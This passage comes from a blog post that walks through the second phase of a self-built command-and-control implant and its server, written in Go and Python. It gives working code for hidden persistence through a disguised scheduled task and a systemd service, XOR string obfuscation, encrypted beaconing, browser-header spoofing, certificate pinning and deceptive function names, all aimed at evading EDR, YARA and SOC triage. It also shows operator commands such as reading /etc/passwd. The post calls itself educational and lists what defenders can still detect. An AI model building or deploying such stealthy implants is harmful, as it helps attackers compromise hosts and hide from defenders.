The random source is crypto/rand seeded, not math/rand, so the sequence is unpredictable even if you know the range.

What This Doesn’t Solve

A defender watching connection timestamps will still see traffic that never exceeds JitterMax and never drops below JitterMin. That bounding box is itself a weak signature. A sufficiently tuned RITA configuration with custom thresholds could flag it. But it won’t trip the default thresholds on most automated beacon detection tools, and it forces the defender from “run automated scan, get alert” to “manually analyze connection patterns over an extended window.” That’s a meaningful increase in detection cost.


3. Dual Execution Modes

The original problem: Every single command went through cmd.exe /C on Windows or /bin/sh -c on Linux. The process tree for a simple whoami looked like:

agent.exe
  └── cmd.exe /C whoami
        └── whoami.exe

EDR products flag this aggressively. An unknown parent repeatedly spawning cmd.exe with varying arguments is textbook C2.

In the first post, I said the fix was direct Windows API calls: GetUserNameW instead of whoami, FindFirstFile instead of dir. I changed my mind. Writing a syscall wrapper for every command I might ever want to run is a losing game. There are hundreds of Windows utilities, and reimplementing even ten of them in pure Go syscalls would be a massive engineering effort for diminishing returns. Instead, I added a second execution mode that removes the shell from the process tree while still running the original binary:

// agent/funcs/exec_direct.go

func RunDiagnosticProbe(command string) (string, error) {
    binary, args := splitDiagnosticArgs(command)

    resolved, err := exec.LookPath(binary)
    if err != nil {
        return "", fmt.Errorf("not found in PATH: %s", binary)
    }

    ctx, cancel := context.WithTimeout(context.Background(), CommandTimeout)
    defer cancel()

    cmd := exec.CommandContext(ctx, resolved, args...)
    cmd.Dir = getCurrentDir()
    setHideWindow(cmd)

    output, err := cmd.CombinedOutput()
    // ...
}

exec.LookPath searches PATH for the binary, then exec.CommandContext spawns it directly. No shell interpreter in between. The process tree now looks like:

agent.exe
  └── whoami.exe

Still visible if an EDR is watching parent-child relationships closely, but cmd.exe is gone. The signal is much weaker.

The Argument Parser

Removing the shell means losing shell argument parsing. When cmd.exe handles findstr "hello world" file.txt, it knows "hello world" is a single argument. Without a shell, I needed my own parser:

func splitDiagnosticArgs(command string) (string, []string) {
    var tokens []string
    var current strings.Builder
    inDouble := false
    inSingle := false

    for i := 0; i < len(command); i++ {
        c := command[i]
        switch {
        case c == '"' && !inSingle:
            if inDouble && i+1 < len(command) && command[i+1] == '"' {
                current.WriteByte('"') // "" escape (Windows convention)
                i++
            } else {
                inDouble = !inDouble
            }
        case c == '\'' && !inDouble:
            inSingle = !inSingle
        case c == '\\' && inDouble && i+1 < len(command) && command[i+1] == '"':
            current.WriteByte('"') // \" escape
            i++
        case (c == ' ' || c == '\t') && !inDouble && !inSingle:
            if current.Len() > 0 {
                tokens = append(tokens, current.String())
                current.Reset()
            }
        default:
            current.WriteByte(c)
        }
    }
    // ...
    return tokens[0], tokens[1:]
}

This handles double quotes, single quotes, \" escapes inside double-quoted strings, and "" as an escaped double-quote (the Windows convention that tripped me up for an embarrassing amount of time). Shell metacharacters like |, >, and && are treated as literal argument strings. They won’t be interpreted.

Which is why the shell mode still exists. When the operator needs pipes, redirects, or command chaining, they prefix the command with shell and accept the OPSEC cost:

whoami                              → exec mode (default, no shell)
net user admin /domain              → exec mode
shell dir C:\Users && whoami        → shell mode (needs &&)
shell cat /etc/passwd | grep root   → shell mode (needs pipe)

The server tags each task with a type field ("exec" or "shell"), and the agent’s dispatcher routes accordingly:

switch j.Type {
case "exec":
    output, execErr = funcs.RunDiagnosticProbe(j.Command)
default:
    output, execErr = funcs.ExecuteDiagnosticTask(j.Command)
}

The dashboard shows a green [exec] badge or an orange [shell] badge next to each command, so the operator knows exactly which mode ran. The OPSEC decision is explicit, visible, and never automatic.


4. Browser Profile Spoofing

The original problem: Go’s http.DefaultClient sends User-Agent: Go-http-client/1.1, this is an immediate flag. I said the fix was to spoof the User-Agent to match normal browser traffic.

What I didn’t appreciate at the time is that just setting the User-Agent string is maybe 20% of the problem. Modern browsers send a pile of metadata headers alongside every request, and they change depending on context. Getting the UA right but everything else wrong creates an IOC on its own: the User-Agent says Chrome, but the rest of the headers say “something that has never been a browser.”

The Header Problem

A real Chrome request to a website includes:

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 ...
Sec-Ch-Ua: "Chromium";v="147", "Not-A.Brand";v="24", "Google Chrome";v="147"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,...
Accept-Language: en-US,en;q=0.9

A Chrome fetch() call from JavaScript includes:

Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Sec-Fetch-Site: same-origin
Accept: */*

Notice what changed. navigate became cors, document became empty, Sec-Fetch-User and Upgrade-Insecure-Requests disappeared entirely, and the Accept header changed. These aren’t optional differences, if the agent sends Sec-Fetch-Mode: navigate on a JSON POST to an API endpoint, that’s a logical impossibility. Real browsers never do that. A navigation is a page load triggered by the user clicking a link or typing a URL, a POST with a JSON body is a programmatic API call, they have different security semantics, and Chrome enforces that distinction in its headers.

If someone is running network analysis and they see a request that claims to be Chrome navigating to a page, but the body is JSON and the method is POST, that’s not Chrome. That’s something pretending to be Chrome, and pretending badly.

The UATransport

The fix is a custom http.RoundTripper that intercepts every outbound HTTP request and injects the correct header set based on what the request actually is:

// agent/funcs/ua.go

type UATransport struct {
    Base    http.RoundTripper
    Profile Profile
}

func (t *UATransport) RoundTrip(req *http.Request) (*http.Response, error) {
    clone := req.Clone(req.Context())
    isFetch := req.Method == "POST"

    clone.Header.Del("User-Agent")

    for key, value := range t.Profile.Headers {
        switch {
        case isFetch && key == "Sec-Fetch-Mode":
            clone.Header.Set(key, "cors")
        case isFetch && key == "Sec-Fetch-Dest":
            clone.Header.Set(key, "empty")
        case isFetch && key == "Sec-Fetch-Site":
            clone.Header.Set(key, "same-origin")
        case isFetch && (key == "Sec-Fetch-User" || key == "Upgrade-Insecure-Requests"):
            continue // Drop navigation-only headers on fetch
        default:
            clone.Header.Set(key, value)
        }
    }

    clone.Header.Set("User-Agent", t.Profile.UserAgent)
    return t.Base.RoundTrip(clone)
}

POST requests (check-ins, result submissions) get fetch context. GET requests (file downloads) get navigation context. The transport is wired into http.DefaultClient at init, so every HTTP call the agent makes goes through it, no code path can accidentally bypass the spoofing.

Five Profiles

The agent ships with five browser profiles, each matching a real browser’s current fingerprint:

  1. Chrome 147 / Windows 10 - full Sec-Ch-Ua client hints with the real stable build string (147.0.7727.55) and the correct Not-A.Brand version (v="24")
  2. Chrome 147 / Linux
  3. Firefox 149 / Windows 10 - no client hints (Firefox doesn’t send them), Firefox-specific Accept header format
  4. Firefox 149 / Linux
  5. Safari 26 / macOS - AppleWebKit/605.1.15 engine string, Safari-specific defaults

The operator selects a profile at build time, and the profile ID and a configurable locale string (for Accept-Language) are baked into the binary.

A Mistake I Made Along the Way

My first Chrome profiles used the placeholder version pattern: Chrome/147.0.0.0 and Not-A.Brand";v="99". This is the pattern that appears in Chrome’s documentation examples and in a lot of spoofing guides. The problem is that real Chrome never ships with .0.0.0 as the minor/build/patch version, and v="99" is the old placeholder that Chrome has since replaced with v="24". Fingerprinting tools specifically flag these placeholder patterns because they indicate a non-genuine client. I had to go check what actual Chrome stable was sending in the wild and match those exact values.

This is the kind of thing you don’t learn from reading about spoofing. You learn it by building it, testing it against a fingerprint checker, and watching it get flagged for a reason you didn’t expect.

What This Doesn’t Solve

The browser profile spoofing works at the HTTP layer, it doesn’t touch the TLS layer. Go’s TLS stack produces a distinctive JA3 fingerprint (a hash of the TLS client hello parameters) that doesn’t match any real browser. A defender correlating the JA3 hash against the claimed User-Agent would see Chrome headers but a Go TLS handshake. The fix is uTLS, a library that lets you mimic a specific browser’s TLS handshake. That’s Phase 3.


5. Payload Encryption (AES-256-GCM)

The original problem: All C2 traffic was plaintext JSON. Check-in payloads, command output, exfiltrated files, all readable by any network tap. A Suricata rule matching "agent_id" in POST bodies would catch every check-in.

Per-Build Keys

At build time, the server generates a fresh 32-byte key and derives an 8-character fingerprint from its SHA-256:

# server/crypto.py

def generate_key():
    key_bytes = os.urandom(32)
    key_hex = key_bytes.hex()
    key_id = hashlib.sha256(key_bytes).hexdigest()[:8]
    return key_hex, key_id

The key is hex-encoded and baked into the agent binary. The key_id fingerprint is not secret: it’s sent in the clear with every message so the server knows which decryption key to use. Since each build gets its own key, the server can manage agents from different builds simultaneously, and compromising one build’s key tells you nothing about another.

The Encryption

AES-256-GCM with a random 12-byte nonce per message:

// agent/funcs/seal.go

func SealTelemetry(key []byte, plaintext []byte) (string, error) {
    block, err := aes.NewCipher(key)
    if err != nil {
        return "", err
    }
    gcm, err := cipher.NewGCM(block)
    if err != nil {
        return "", err
    }

    nonce := make([]byte, gcm.NonceSize()) // 12 bytes
    if _, err := io.ReadFull(rand.Reader, nonce); err != nil {
        return "", err
    }

    blob := gcm.Seal(nonce, nonce, plaintext, nil)
    return base64.StdEncoding.EncodeToString(blob), nil
}

The gcm.Seal(nonce, nonce, plaintext, nil) call is doing something a little non-obvious. The first nonce argument is the destination slice prefix, the output gets appended to it. So the result is [12-byte nonce][ciphertext][16-byte GCM auth tag], all in one blob. The receiver splits on byte 12 to separate the nonce from the ciphertext.

I chose GCM specifically because it’s an authenticated encryption mode. The 16-byte tag means any tampering with the ciphertext causes decryption to fail. A network proxy can’t modify commands in transit (say, changing whoami to shutdown /s) because the authentication tag would be invalid. It also prevents replay attacks at the individual message level: replaying the same encrypted blob produces the same plaintext, but the nonce collision means the server can detect it if it tracks seen nonces (which it currently doesn’t, admittedly, that’s a gap).

The Envelope

Every message between agent and server wraps the encrypted payload in a simple JSON envelope:

{
    "kid": "a3f7c2e1",
    "data": "Base64(nonce + ciphertext + tag)"
}

The server-side decryption mirrors the agent:

# server/crypto.py

def decrypt_payload(key_hex, encoded):
    key = bytes.fromhex(key_hex)
    raw = base64.b64decode(encoded)
    nonce, ct = raw[:12], raw[12:]
    return AESGCM(key).decrypt(nonce, ct, None)

If the key is wrong or the data has been tampered with, AESGCM.decrypt() raises InvalidTag and the request is rejected.

What This Doesn’t Solve

Encryption makes the payload opaque. It doesn’t make the traffic invisible. A network analyst can still see that something is making periodic POST requests to the same endpoint with similar-sized JSON bodies. Traffic analysis (connection timing, payload size patterns, IP reputation) operates on metadata, not content. The encryption prevents a Suricata rule from matching on specific field names in the body, but it doesn’t prevent behavioral analysis from flagging the pattern.


6. XOR String Obfuscation

The original problem: Running strings against the compiled binary would reveal the server URL, all API paths, the self-destruct (__selfdestruct__), and the persistence service name. Any YARA rule matching those strings would instantly classify the binary.

AES handles the wire, while XOR handles the binary.

At build time, the server generates a random 32-byte key per build and encrypts every sensitive string before writing it into the generated config.go:

# server/app.py

def _xor_encrypt(key, plaintext):
    data = plaintext.encode()
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data)).hex()

The result is hex-encoded and written as a Go string literal. At runtime, the agent decodes them into memory on first use:

// agent/funcs/config_decode.go

func ResolveConfig(key []byte, hexData string) string {
    data, _ := hex.DecodeString(hexData)
    out := make([]byte, len(data))
    for i, b := range data {
        out[i] = b ^ key[i%len(key)]
    }
    return string(out)
}

The generated config.go looks like this:

func InitializeTelemetry() {
    TelemetryEndpoint = funcs.ResolveConfig(obfKey, "a7c3f2e1b9d0...")
    PathCheckin       = funcs.ResolveConfig(obfKey, "b1d4e5f6a2c3...")
    PathResult        = funcs.ResolveConfig(obfKey, "c9e8f7d6b5a4...")
    FlushCommand      = funcs.ResolveConfig(obfKey, "d2f1a3b4c5e6...")
    ServiceLabel      = funcs.ResolveConfig(obfKey, "e4b6c8d9a1f2...")
}

Nothing sensitive appears as a printable string in the binary. strings turns up hex garbage.

Is XOR real encryption? No, and I’m not going to pretend it is. XOR with a repeating key is trivially breakable with known-plaintext or frequency analysis. If a reverse engineer opens the binary in Ghidra, finds the ResolveConfig function, grabs the XOR key from the neighboring variable, and runs the decryption manually, they’ll have every string in clear text in about ten minutes. But the threat model for string obfuscation isn’t a reverse engineer doing focused analysis, it’s automated scanners. YARA rules, EDR heuristics, the SOC analyst’s strings | grep during initial triage. XOR defeats all of those. It buys you time by moving the binary from “instantly flagged by automated tools” to “requires manual analysis to classify.”


7. Certificate Pinning

The original problem: All traffic was unencrypted HTTP. The fix was HTTPS, but self-signed certificates introduce their own trust problem.

The Trust Problem

When you use a self-signed cert, the agent can’t validate it through the normal certificate chain (there’s no CA that vouches for it). If you just set InsecureSkipVerify: true and call it a day, you’ve encrypted the transport but you haven’t authenticated the server. A man-in-the-middle can present their own cert and the agent will happily connect. You’ve built a door and then left it open.

Certificate pinning solves this. Instead of trusting a CA chain, the agent knows the exact public key it expects to see, baked into the binary at build time. If the TLS handshake presents a different key, connection will be refused, and no fallback.

How It Works

The operator generates a self-signed cert before starting the server:

python gen_cert.py --cn localhost --san-ip 127.0.0.1 --san-dns localhost

The server auto-detects server/certs/server.crt at startup and switches to HTTPS. At build time, the pipeline reads the cert, extracts the SPKI (Subject Public Key Info), hashes it with SHA-256, XOR-encrypts the hash, and bakes it into the binary:

def compute_spki_pin(cert):
    spki_der = cert.public_key().public_bytes(
        Encoding.DER, PublicFormat.SubjectPublicKeyInfo
    )
    return hashlib.sha256(spki_der).hexdigest()

At runtime, the agent sets up a custom TLS verifier:

// agent/funcs/pinverify.go

func MakePinVerifier(pinnedHash string) func([][]byte, [][]*x509.Certificate) error {
    return func(rawCerts [][]byte, _ [][]*x509.Certificate) error {
        if len(rawCerts) == 0 {
            return fmt.Errorf("no certificate presented")
        }

        cert, err := x509.ParseCertificate(rawCerts[0])
        if err != nil {
            return fmt.Errorf("failed to parse certificate: %w", err)
        }

        spkiDER, err := x509.MarshalPKIXPublicKey(cert.PublicKey)
        if err != nil {
            return fmt.Errorf("failed to marshal public key: %w", err)
        }

        hash := sha256.Sum256(spkiDER)
        actual := hex.EncodeToString(hash[:])

        if actual != pinnedHash {
            return fmt.Errorf("certificate pin mismatch")
        }
        return nil
    }
}

The TLS config uses InsecureSkipVerify: true (to bypass the CA chain check that would reject a self-signed cert) and replaces it with VerifyPeerCertificate pointing at the pin verifier. The agent extracts the leaf certificate from the TLS handshake, serializes its public key to SPKI DER format, SHA-256 hashes it, and compares. Mismatch = hard fail, no retry, no fallback.

There’s also a panic at startup if a pin is set but the server URL starts with http://. Running pin verification over unencrypted HTTP is a contradiction that should fail.

Why Pin the SPKI, Not the Whole Certificate?

If I pinned the full certificate hash, the agent would break every time the cert was renewed, even if the key pair stayed the same (just the expiry date changed). By pinning just the public key’s SPKI hash, the operator can re-sign the cert with a new validity period and existing agents keep working. If they actually rotate the key pair, they rebuild all agents. That’s a reasonable trade-off for in my opinion (for now).


8. Randomized URL Slugs

The original problem: /api/checkin, /api/result, /api/upload, are ddescriptive, human-readable, easy to write Snort/Suricata signatures for.

At first server launch, four random 8-character hex slugs are generated and stored in SQLite:

def _init_agent_paths():
    keys = ["path_checkin", "path_result", "path_upload", "path_files"]
    for k in keys:
        stored[k] = "/" + secrets.token_hex(4)  # e.g. "/a1b2c3d4"

The agent-facing endpoints now live at paths like /a1b2c3d4. The slugs persist across server restarts so existing agents stay connected. At build time, all four paths are XOR-encrypted and baked into the agent binary. They never appear as plaintext in the binary or in the agent’s source code.

The operator-facing API (/api/task, /api/agents, /api/builds, etc.) still lives at /api/*. This split also makes the API key authentication simpler: the @before_request hook checks for an X-API-Key header on any path starting with /api/. Agent-facing paths fall outside that namespace, so agents don’t need the operator key.

Signature-based detection now has to target per-deployment paths that look like any other random hex identifier: a session token, a UUID fragment, a CDN cache key. Not impossible to detect, but the analyst can’t write one rule that catches every deployment.


9. Persistence: Scheduled Tasks and Systemd

The original problem: Three compounding failures. Windows persistence spawned reg.exe (visible in process tree), wrote to the most-monitored registry key in existence (HKCU\...\Run), and named the entry C2Agent.

I replaced this with two new persistence backends. The legacy methods (registry run key, crontab @reboot) are still available for operators who want to test detection rules for those specific mechanisms, but the defaults are now significantly quieter.

Windows: Task Scheduler via COM

Instead of spawning schtasks.exe or reg.exe, the agent talks directly to the Task Scheduler through the COM API. No child process. Everything happens in-process:

// agent/funcs/update_scheduler_windows.go

func registerUpdateSchedule(exePath string) error {
    ole.CoInitializeEx(0, ole.COINIT_APARTMENTTHREADED)
    defer ole.CoUninitialize()

    unknown, _ := oleutil.CreateObject("Schedule.Service")
    service, _ := unknown.QueryInterface(ole.IID_IDispatch)
    defer service.Release()

    oleutil.CallMethod(service, "Connect")

    folder := oleutil.MustCallMethod(service, "GetFolder", "\\").ToIDispatch()
    defer folder.Release()

    def := oleutil.MustCallMethod(service, "NewTask", 0).ToIDispatch()
    defer def.Release()
    // ...
}

The task is configured with a logon trigger (fires on user login), standard user privileges (no UAC prompt), marked hidden in the Task Scheduler UI, and no execution time limit. The registration flag is 6 (TASK_CREATE_OR_UPDATE), so running the agent twice updates the existing task instead of creating a duplicate.

The task name comes from the XOR-obfuscated ServiceLabel constant, which decodes to EndpointAutoUpdate. The description:

Keeps endpoint telemetry data in sync with the management server.

That reads like corporate endpoint management software. A sysadmin scrolling through Task Scheduler wouldn’t look twice. An analyst specifically hunting for new scheduled tasks (Windows Event ID 4698) would still find it, but the name and description wouldn’t scream “malware.”

One thing that tripped me up during development: COM object lifecycle management. Every QueryInterface, every MustCallMethod that returns an IDispatch, every ToIDispatch() conversion creates a COM reference that needs to be released. If you miss a Release() call, you leak COM references. In a short-lived program this doesn’t matter much, but if the persistence code ever ran in a loop (retry logic, re-registration), the leak would compound. Every COM object now gets a deferred Release() immediately after acquisition.

Linux: Systemd User Service

On Linux, the agent writes a systemd user service and enables it:

func registerUpdateDaemon(exePath string) error {
    home := os.Getenv("HOME")
    if home == "" {
        return fmt.Errorf("$HOME is not set")
    }

    unitDir := filepath.Join(home, ".config", "systemd", "user")
    os.MkdirAll(unitDir, 0755)

    unitContent := fmt.Sprintf(`[Unit]
Description=Endpoint Telemetry Diagnostics Daemon
After=network-online.target
Wants=network-online.target

[Service]
Type=simple
ExecStart=%s
Restart=on-failure
RestartSec=30

[Install]
WantedBy=default.target
`, exePath)

    unitPath := filepath.Join(unitDir, ServiceLabel+".service")
    os.WriteFile(unitPath, []byte(unitContent), 0644)

    exec.Command("systemctl", "--user", "daemon-reload").CombinedOutput()
    exec.Command("systemctl", "--user", "enable", ServiceLabel+".service").CombinedOutput()

    return nil
}

A few design decisions here:

User-level, no root. The --user flag means this runs under the current user’s systemd instance. No sudo, no privilege escalation. The trade-off is that the service only runs while the user is logged in, unless the system has loginctl enable-linger set for that user. We don’t touch linger because it requires root or polkit authorization on most distros, and attempting it would be noisy.

Auto-restart. Restart=on-failure with RestartSec=30 means if the agent crashes, systemd brings it back after 30 seconds. Free reliability that I don’t have to implement in the agent itself.

Network dependency. After=network-online.target and Wants=network-online.target mean the service waits for network connectivity before starting. Without this, the agent would start, fail its first check-in because the network isn’t up yet, and either error out or waste cycles retrying during boot.

$HOME check. If $HOME is unset (some container environments, some su configurations), the install fails with a clear error instead of silently writing a unit file to / + .config/systemd/user/.

Removal is symmetric: disable, stop, delete the unit file, daemon-reload. The symmetry matters because the self-destruct sequence calls RemoveAutoUpdater(), and a removal path that doesn’t undo everything the install did will leave artifacts.

macOS

Not implemented. The build server rejects macOS builds with persist_method != "none" at compile time. macOS persistence would need a LaunchAgent plist in ~/Library/LaunchAgents/, which is a different mechanism. Phase 3 (probably).


10. Cover-Story Naming

The original problem: strings agent.exe | grep -i "persist\|exfil\|command" would immediately classify the binary. Even with symbols stripped (-s -w), Go embeds function names for runtime reflection and stack traces.

Every function, variable, source file, and the Go module itself now follows an “endpoint telemetry/diagnostics” naming convention.

What ChangedBeforeAfter
Check-in functioncheckIn()SyncDeviceState()
Result submissionsendResult()SubmitDiagnosticReport()
Self-destructSelfDestruct()WipeLocalCacheAndExit()
Persistencepersist()InstallAutoUpdater()
Shell executionExecuteCommand()ExecuteDiagnosticTask()
Direct executionRunDirectCommand()RunDiagnosticProbe()
File uploadUploadFile()SubmitCrashDump()
File downloadDownloadFile()FetchUpdatePackage()
EncryptionEncryptPayload()SealTelemetry()
DecryptionDecryptPayload()UnsealTelemetry()
Jitter calculationCalculateJitter()CalculateBackoff()
Go modulec2-agentendpoint-telemetry

Source files got the same treatment: selfdestruct.go -> cache_purge.go, persist.go -> auto_updater.go, shell.go -> exec_diag.go, transfer.go -> dump_sync.go.

Build metadata cleanup. -trimpath strips absolute host build paths from the binary. Without it, strings reveals C:\Users\<USER>\Desktop\repos\C2-Project\agent\funcs\selfdestruct.go, which is not exactly subtle. -buildid= clears the per-build hash. The Go module rename (c2-agent -> endpoint-telemetry) handles the module name that Go embeds in every binary regardless of strip flags.

Will a skilled reverse engineer be fooled? No. Once they’re reading disassembly and tracing data flows, the names are irrelevant. But this isn’t about defeating human analysis. It’s about surviving automated classification: YARA rules matching suspicious function names, EDR heuristics looking for known-bad string patterns, the SOC analyst running a quick strings triage before deciding whether to escalate. If the names say “telemetry” and “diagnostics,” the binary goes to the bottom of the priority queue instead of the top.


11. Server Hardening

Three problems from the original, three fixes.

API Key Authentication

All /api/* endpoints now require a valid X-API-Key header:

@app.before_request
def check_api_key():
    if request.path.startswith("/api/"):
        key = request.headers.get("X-API-Key", "")
        stored_key = _get_config_value("api_key")
        if not stored_key or not hmac.compare_digest(key, stored_key):
            return jsonify({"error": "Unauthorized"}), 401

The key is a 32-character hex string generated at first launch and stored in server_config. It’s printed to the operator’s terminal on startup.

The hmac.compare_digest instead of == is a small detail that matters. Normal string comparison in Python short-circuits on the first differing byte. If you’re comparing a3f7c2e1 against a3f7xxxx, Python returns False as soon as it hits the 5th byte. Timing that comparison over many requests can theoretically leak how many leading bytes are correct. hmac.compare_digest runs in constant time regardless of where the strings differ. In practice, timing attacks over a network against a local API key are extremely hard to pull off, but the defense is one function call, so why not.

The dashboard prompts for the key on load, stores it in sessionStorage (wiped when the tab closes, not persisted across sessions), and injects it into every outbound API call through a centralized apiFetch() wrapper.

Server Header Spoofing

@app.after_request
def cloak_server_header(response):
    response.headers["Server"] = "nginx/1.24.0"
    return response

Every response now claims to be nginx instead of Werkzeug/3.x Python/3.x. It won’t survive deep probing (Flask’s error page format and response timing are distinct from nginx), but it defeats shallow fingerprinting.

Debug Mode

Off. The MVP had debug=True, which exposes the Werkzeug interactive debugger. If any route throws an unhandled exception, the debugger gives anyone with network access a full Python REPL on the C2 server. That’s a remote code execution vulnerability on your own infrastructure. Not great.


12. The CurrentDir Race Fix

This isn’t a new feature, but it’s a fix I specifically called out as pending in the first blog post, so I should close the loop.

The original code tracked the agent’s working directory in a global CurrentDir variable. cd commands wrote to it synchronously in the main loop, but regular commands read from it concurrently in goroutines. Running go run -race would flag this as a data race immediately.

The fix is a sync.RWMutex:

var (
    currentDirMu sync.RWMutex
    CurrentDir   string
)

func getCurrentDir() string {
    currentDirMu.RLock()
    defer currentDirMu.RUnlock()
    return CurrentDir
}

func setCurrentDir(dir string) {
    currentDirMu.Lock()
    defer currentDirMu.Unlock()
    CurrentDir = dir
}

Read-lock in every command execution path (ExecuteDiagnosticTask, RunDiagnosticProbe), write-lock in handleCd. Multiple commands can read the working directory concurrently (since they take read-locks), and a cd command blocks until all in-flight reads complete before writing.


13. What’s Still Detectable

I fixed every IOC from the first post. But “fixed” doesn’t mean “invisible.” Here’s what a competent blue team can still catch.

JA3 fingerprint mismatch. The browser profile spoofing works at the HTTP level. The TLS handshake still uses Go’s TLS stack, which produces a distinctive JA3 hash. A defender correlating JA3 against the User-Agent would see Chrome headers but a Go TLS fingerprint. The fix is uTLS (Phase 3).

Windows Event ID. The COM-based scheduled task avoids schtasks.exe in the process tree, but the task creation itself generates an Event ID in the Security log. Any SIEM forwarding Windows events will see it (most will be doing this).

systemd is not invisible. systemctl --user list-unit-files lists the service. The unit file sits in ~/.config/systemd/user/. File integrity monitoring catches it. A manual check catches it.

The cleanup batch script. On Windows self-destruct, the batch file written to disk with del /f /q loops is a forensic artifact. Better approaches exist (PowerShell Start-Process, MoveFileEx with MOVEFILE_DELAY_UNTIL_REBOOT). Phase 3.

Bounded jitter. Traffic never exceeds JitterMax and never drops below JitterMin. That bounding box is a weak but extractable signal given enough observation time.

Process parentage. Even in exec mode, an unsigned binary spawning system utilities is unusual. No cmd.exe in between, but the parent-child relationship is still visible to an EDR that cares about who spawned whoami.exe.

DNS and IP reputation. None of this evasion work matters if the callback IP is already flagged. Threat intelligence feeds operate outside the agent’s control entirely.

No nonce replay tracking. The AES-256-GCM encryption uses random nonces and authenticated encryption, but the server doesn’t track seen nonces. An attacker with network access could replay a captured check-in blob. It would decrypt to a valid but stale payload. The server would process it as a duplicate check-in (mostly harmless), but it’s a gap in the design.


14. Phase 3 Roadmap

JA3 fingerprint spoofing. Integrate uTLS to mimic a specific browser’s TLS handshake. If you’re spoofing Chrome at the HTTP level, you should be spoofing Chrome at the TLS level too.

In-memory payload execution. The agent currently touches disk as a binary. Phase 3 explores reflective loading and in-memory execution (still very much in the research phase).

macOS persistence. LaunchAgent plists in ~/Library/LaunchAgents/ (if I can get my hands on a MacBook to do testing).

Interactive shell sessions. The current model is request-response: send a command, get output. Phase 3 adds persistent shell sessions with piped I/O for interactive tooling.

Traffic shaping. Varying payload sizes and timing to mimic legitimate application traffic (Slack webhooks, Windows Update telemetry, cloud API calls) instead of just randomizing the interval.

Agent chaining. Using a compromised host to relay traffic for agents that can’t reach the C2 server directly.

This List is subject to change as I continuely research better methods, and more features. The most up-to-date version will always be on the README.md in the github repo.


Phase 1 started as a framework that would get caught by strings and a regex. It now requires behavioral analysis, process tree correlation, TLS fingerprinting, or Windows event log forwarding. The gap between those two levels of detection effort is where all the engineering in this post lives. Every fix moved the detection bar from “automated scan” to “manual investigation,” and understanding exactly where that bar sits now, and why it can’t go higher without the Phase 3 work, is the whole point of building from scratch.

This framework is built for educational purposes only.